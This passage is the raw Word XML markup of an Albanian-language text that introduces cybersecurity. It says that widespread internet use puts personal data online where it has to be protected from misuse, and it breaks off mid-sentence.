    <w:p w14:paraId="1627458C" w14:textId="6199A07F" w:rsidR="00382E55" w:rsidRDefault="002D489F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hvillim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> internetit dhe rritja e p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rdorimit t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tij n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mas</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shum</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> madhe n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shoq</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rin</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> njer</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zore ka rrjedh n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nj</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pik</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ku pothuajse </w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ç</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do e dh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, duke i p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rfshir</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> edhe t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nat personale </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sht</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e ruajtur n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r k</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> arsye ka lindur nevoja e ruatjes me </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do kusht t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tyre, p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r shkak t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mund</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sis</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> keqp</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rdorimit t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tyre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C0007" w14:textId="49D0C85E" w:rsidR="008B1807" w:rsidRDefault="008B1807" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Siguria kibernetike </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sht</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nj</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ra nga </w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ç</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shtejt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> m</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> r</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sishme</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> koh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rave t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> fundit, p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r asye se shum</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>na jan</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vendosura n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bot</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="001B4151">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n digjitale</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dhe ruatja e tyre p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sfid</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
